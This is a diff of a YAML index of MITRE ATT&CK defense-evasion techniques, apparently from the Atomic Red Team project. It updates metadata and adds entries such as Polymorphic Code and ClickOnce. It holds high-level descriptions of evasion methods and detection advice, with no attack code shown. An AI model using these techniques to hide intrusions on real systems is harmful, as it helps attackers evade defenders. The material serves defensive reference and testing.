-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10038,7 +10119,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10128,7 +10277,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10751,9 +10889,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -10990,48 +11124,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11040,9 +11150,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11107,7 +11245,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11385,7 +11530,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11419,11 +11555,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11441,6 +11577,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11452,13 +11589,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11503,9 +11640,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests:
     - name: GCP - Delete Activity Event Log
@@ -11629,18 +11763,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
